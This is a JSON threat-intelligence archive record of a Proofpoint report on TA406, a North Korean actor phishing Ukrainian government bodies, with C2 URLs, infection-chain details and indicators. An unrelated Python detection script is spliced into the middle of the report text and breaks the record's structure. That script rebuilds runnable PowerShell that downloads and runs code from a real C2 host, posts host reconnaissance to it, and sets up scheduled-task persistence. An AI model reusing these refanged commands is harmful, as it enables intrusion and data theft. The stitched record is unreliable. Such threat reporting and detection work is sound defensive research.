{
	"id": "2d2b6e17-e411-46c3-aae4-27180830378f",
	"created_at": "2026-04-06T00:22:08.45314Z",
	"updated_at": "2026-04-10T13:12:07.472886Z",
	"deleted_at": null,
	"sha1_hash": "02247521d3bc55b6eaf4e921f7fd5b75dc328187",
	"title": "TA406 Pivots to the Front | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3146260,
	"plain_text": "TA406 Pivots to the Front | Proofpoint US\r\nBy Greg Lesnewich, Saher Naumaan, Mark Kelly, and The Proofpoint Threat Research Team\r\nPublished: 2025-05-08 · Archived: 2026-04-05 13:16:14 UTC\r\nMay 13, 2025\r\nWhat happened \r\nIn February 2025, TA406 began targeting government entities in Ukraine, delivering both credential harvesting and malware in its phishing campaigns. The aim of these campaigns is likely to collect intelligence on the trajectory of the Russian invasion. TA406 is a Democratic People's Republic of Korea (DPRK) state-sponsored actor that overlaps with activity publicly tracked by third parties as Opal Sleet and Konni. The group’s interest in Ukraine follows historical targeting of government entities in Russia for strategic intelligence gathering. TA406 relies on freemail sender addresses spoofing members of think tanks to convince the target to engage with the phishing email. The lure content draws heavily on recent events in Ukrainian domestic politics. \r\nMalware delivery \r\nSince at least 2019, TA406 has shown a preference for HTML and CHM files that run embedded PowerShell in the early stages of its malware deployment campaigns. The lure emails observed in a February 2025 TA406 campaign impersonate a fictitious senior fellow at a think tank called the Royal Institute of Strategic Studies, itself a fictitious organization. The email contains a link to the file hosting service MEGA, from which a password-protected RAR archive is downloaded. If the archive is decrypted and its contents run, it initiates an infection chain that uses PowerShell to conduct extensive reconnaissance on the target host. When the target did not click the link, the actor sent multiple follow-up phishing emails on consecutive days, asking whether the target had received the prior emails and whether they would download the files. \r\nFollow-up phishing email from TA406. 
\r\nThe file Analytical Report.rar drops a CHM file of the same name when decrypted. The CHM file contains multiple HTML files that display lure content related to former Ukrainian military leader Valeriy Zaluzhnyi. PowerShell embedded in the HTML executes if the user clicks within the page; it issues a GET request to hxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/test.txt to download further PowerShell and execute it. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front\r\nPage 1 of 7\n\nThe next-stage PowerShell executes several commands to gather information about the victim host, including ipconfig /all and systeminfo, commands to collect recent file names and disk information, and WMI queries to enumerate any anti-virus products installed on the host. The collected output is concatenated, Base64-encoded and sent via a POST request to hxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/receive.php. The PowerShell then writes a batch file, state.bat, into the host’s APPDATA folder, reusing scripting logic similar to that of the initial HTML file. The batch file is registered as an autorun entry for persistence and runs at machine start-up. \r\nLate stage PowerShell. \r\nProofpoint has also observed the first-stage file delivered as an HTML attachment to the phishing email. If the target opens the HTML and clicks the embedded link, a ZIP file is downloaded from hxxps://lorica[.]com.ua/MFA/вкладення.zip (machine translation: “attachment.zip”). The ZIP file contains a benign PDF as well as an LNK, ‘Why Zelenskyy fired Zaluzhnyi.lnk.’ If run, the LNK file executes Base64-encoded PowerShell. \r\nBenign PDF lure. \r\nThe decoded LNK command contains further Base64-encoded PowerShell, which creates a scheduled task named Windows Themes Update. 
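As an added triage example (not code from the Proofpoint post): the LNK chain above wraps one Base64 layer inside another, while the CHM chain runs its recon and drops state.bat from plain PowerShell. The Python script below peels -EncodedCommand and FromBase64String layers out of a process command line and then matches the decoded text against the behaviours described on this page: the two C2 paths, the recon commands, state.bat, the Windows Themes Update task and the Themes.jse stager. The four events are constructed to mirror the report, not captured telemetry; the inner script that writes Themes.jse and registers the task is an assumed stand-in for the VBScript stage, and the PowerShell syntax of the samples is illustrative.

```python
import base64
import re


def refang(s):
    '''The report writes indicators defanged (hxxp, [.]); live telemetry does not.'''
    return s.replace('hxxp', 'http').replace('[.]', '.')


# Behaviours the report describes, as case-insensitive substring checks on the
# fully decoded command line. A rule fires only when every needle is present,
# so a generic command such as systeminfo on its own does not trigger it.
RULES = [
    ('CHM/HTML stage fetches next-stage PowerShell from C2',
     ['pokijhgcfsdfghnj.mywebcommunity[.]org/main/test.txt']),
    ('recon output POSTed to C2',
     ['pokijhgcfsdfghnj.mywebcommunity[.]org/main/receive.php']),
    ('host recon: ipconfig, systeminfo and AV inventory via WMI',
     ['ipconfig /all', 'systeminfo', 'antivirusproduct']),
    ('state.bat dropped for autorun persistence', ['state.bat']),
    ('scheduled task Windows Themes Update', ['windows themes update']),
    ('Themes.jse (JScript Encoded) stager', ['themes.jse']),
]

# -e / -ec / -enc / -EncodedCommand <base64>, and [Convert]::FromBase64String(<base64>)
ENC_FLAG = re.compile('-e(ncodedcommand|ncoded|nc|c)? +(?P<blob>[A-Za-z0-9+/=]{16,})', re.I)
B64_CALL = re.compile('FromBase64String[(][^A-Za-z0-9+/=]{0,2}(?P<blob>[A-Za-z0-9+/=]{16,})', re.I)


def decode_blob(blob):
    raw = base64.b64decode(blob + '=' * (-len(blob) % 4))
    # -EncodedCommand is always UTF-16LE; FromBase64String payloads may be UTF-8
    # or UTF-16LE. ASCII text in UTF-16LE has a NUL byte at every odd offset.
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode('utf-16-le', errors='replace')
    return raw.decode('utf-8', errors='replace')


def decode_layers(command_line, max_depth=5):
    '''Return [command_line, stage1, stage2, ...], peeling nested Base64 stages.'''
    layers = [command_line]
    for _ in range(max_depth):
        m = ENC_FLAG.search(layers[-1]) or B64_CALL.search(layers[-1])
        if not m:
            break
        try:
            layers.append(decode_blob(m.group('blob')))
        except ValueError:  # bad padding / non-Base64 data: stop peeling
            break
    return layers


def triage(event):
    '''Return the names of the rules a process-creation event matches.'''
    layers = decode_layers(event['command_line'])
    haystack = ' '.join(layers).lower()
    hits = [name for name, needles in RULES
            if all(refang(n) in haystack for n in needles)]
    parent = event.get('parent_image', '').lower()
    if parent.endswith('hh.exe') and 'powershell' in event['image'].lower():
        hits.append('PowerShell spawned by hh.exe (CHM viewer)')
    if len(layers) > 2:
        hits.append('nested Base64 layers: %d' % (len(layers) - 1))
    return hits


def encoded_command(script):
    '''Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64.'''
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')


# Constructed telemetry shaped like the chains in the report (not captured samples).
# INNER is an assumed stand-in for the VBScript stage that drops Themes.jse.
INNER = '''$p = Join-Path $env:APPDATA 'Themes.jse'
Set-Content -Path $p -Value $jse
schtasks /create /sc minute /mo 1 /tn 'Windows Themes Update' /tr ('wscript.exe ' + $p) /f'''
OUTER = '''$s = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('%s')); Invoke-Expression $s''' % encoded_command(INNER)
FIRST_STAGE = refang('''powershell.exe -ep bypass -w hidden -c IEX((New-Object Net.WebClient).DownloadString('hxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/test.txt'))''')
RECON = refang('''powershell.exe -nop -w hidden -c $o = (ipconfig /all; systeminfo; Get-WmiObject -Namespace root/SecurityCenter2 -Class AntiVirusProduct) | Out-String; $b = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($o)); Invoke-WebRequest -Method POST -Uri hxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/receive.php -Body $b; Set-Content (Join-Path $env:APPDATA state.bat) $bat''')

SAMPLE_EVENTS = {
    'chm_stage1': {'image': 'powershell.exe', 'parent_image': 'hh.exe', 'command_line': FIRST_STAGE},
    'chm_stage2': {'image': 'powershell.exe', 'parent_image': 'powershell.exe', 'command_line': RECON},
    'lnk': {'image': 'powershell.exe', 'parent_image': 'explorer.exe',
            'command_line': 'powershell.exe -NoP -W Hidden -EncodedCommand ' + encoded_command(OUTER)},
    'benign': {'image': 'powershell.exe', 'parent_image': 'explorer.exe',
               'command_line': 'powershell.exe -EncodedCommand ' + encoded_command('Get-Date')},
}


def triage_all(events):
    '''Map each event name to its list of findings; an empty list means clean.'''
    return {name: triage(ev) for name, ev in events.items()}


if __name__ == '__main__':
    for name, hits in triage_all(SAMPLE_EVENTS).items():
        print(name, '->', hits or 'clean')
```

Run it as a script to print the findings per event. Against real data the event dicts would be filled from Sysmon Event ID 1 (process creation) or, already decoded, from PowerShell 4104 script-block logs. Requiring every needle of a rule keeps generic commands such as systeminfo from firing on their own, while the nested-layer count flags the LNK style of obfuscation even when no indicator in the rule list matches.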
\r\nLNK command with Base64-encoded PowerShell. \r\nThe PowerShell uses VBScript to drop a JScript Encoded file called Themes.jse, which the scheduled task then runs. The JSE file checks in to a TA406-controlled URL and executes the response with PowerShell. Proofpoint was unable to obtain a next-stage payload from this URL at the time of analysis. \r\nDecoded PowerShell. \r\nLikely credential harvesting \r\nPrior to TA406’s malware delivery campaigns, Proofpoint also observed TA406 attempting to gather credentials by sending fake Microsoft security alert messages to Ukrainian government entities from Proton Mail accounts. The messages claim the target’s account has had unusual sign-in activity from various IP addresses and ask the target to verify the login attempt via a link to the compromised domain jetmf[.]com. \r\nLikely TA406 credential harvesting email. \r\nA credential harvesting page could not be recovered at the time of analysis. However, the same compromised domain has previously been abused for Naver credential harvesting, which aligns with historical TA406 activity, although attribution to TA406 has not been confirmed with high confidence. These credential harvesting campaigns took place before the attempted malware deployments and targeted some of the same users later targeted by the HTML delivery campaign described above. \r\nWhy it matters \r\nProofpoint assesses that TA406 is targeting Ukrainian government entities to better understand Ukraine’s appetite to continue fighting against the Russian invasion and to assess the medium-term outlook of the conflict. 
North Korea committed troops to assist Russia in the fall of 2024, and TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments. Unlike Russian groups, which have likely been tasked with gathering tactical battlefield information and targeting Ukrainian forces in situ, TA406 has typically focused on more strategic, political intelligence collection. \r\nIndicators of compromise \r\nIndicator | Type | Context | First seen \r\nMicroft Acount Tearns \u003cemln0reply@protonmail[.]com\u003e | Email | Credential harvest delivery | February 2025 \r\nMicrosooft \u003ceml-n0replypro@proton[.]me\u003e | Email | Credential harvest delivery | February 2025 \r\njetmf[.]com | Domain | Credential harvest delivery | February 2025 \r\njohn.smith.19880@outlook[.]com | Email | Malware delivery | February 2025 \r\njohn.dargavel.smith46@gmail[.]com | Email | Malware delivery | February 2025 \r\nhxxps://mega[.]nz/file/SmxUiA4K#QoS_PYQDnJN4VtsSg5HoCv5eOK0AI1bL6Cw5lxA0zfI | URL | Malware delivery | February 2025 \r\nhxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/test.txt | URL | C2 | February 2025 \r\nhxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/receive.php | URL | C2 | February 2025 \r\nhxxps://lorica[.]com.ua/MFA/вкладення.zip | URL | Malware delivery | February 2025 \r\nhxxp://qweasdzxc.mygamesonline[.]org/dn.php | URL | C2 | February 2025 \r\nhxxp://wersdfxcv.mygamesonline[.]org/view.php | URL | C2 | February 2025 \r\n58adb6b87a3873f20d56a10ccde457469adb5203f3108786c3631e0da555b917 | SHA256 | Malware delivery | February 2025 \r\n28116e434e35f76400dc473ada97aeae9b93ca5bcc2a86bd1002f6824f3c9537 | SHA256 | Malware delivery | February 2025 \r\n2a13f273d85dc2322e05e2edfaec7d367116366d1a375b8e9863189a05a5cec5 | SHA256 | Malware delivery | February 2025 \r\nSource: https://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front"
	],
	"report_names": [
		"ta406-pivots-front"
	],
	"threat_actors": [
		{
			"id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4",
			"created_at": "2025-08-07T02:03:25.096857Z",
			"updated_at": "2026-04-10T02:00:03.659118Z",
			"deleted_at": null,
			"main_name": "NICKEL JUNIPER",
			"aliases": [
				"Konni",
				"OSMIUM ",
				"Opal Sleet "
			],
			"source_name": "Secureworks:NICKEL JUNIPER",
			"tools": [
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3917d167-449d-423a-89db-41f49716a6d7",
			"created_at": "2023-03-04T02:01:54.083975Z",
			"updated_at": "2026-04-10T02:00:03.355386Z",
			"deleted_at": null,
			"main_name": "TA406",
			"aliases": [],
			"source_name": "MISPGALAXY:TA406",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b43c8747-c898-448a-88a9-76bff88e91b5",
			"created_at": "2024-02-02T02:00:04.058535Z",
			"updated_at": "2026-04-10T02:00:03.545252Z",
			"deleted_at": null,
			"main_name": "Opal Sleet",
			"aliases": [
				"Konni",
				"Vedalia",
				"OSMIUM"
			],
			"source_name": "MISPGALAXY:Opal Sleet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434928,
	"ts_updated_at": 1775826727,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/02247521d3bc55b6eaf4e921f7fd5b75dc328187.pdf",
		"text": "https://archive.orkl.eu/02247521d3bc55b6eaf4e921f7fd5b75dc328187.txt",
		"img": "https://archive.orkl.eu/02247521d3bc55b6eaf4e921f7fd5b75dc328187.jpg"
	}
}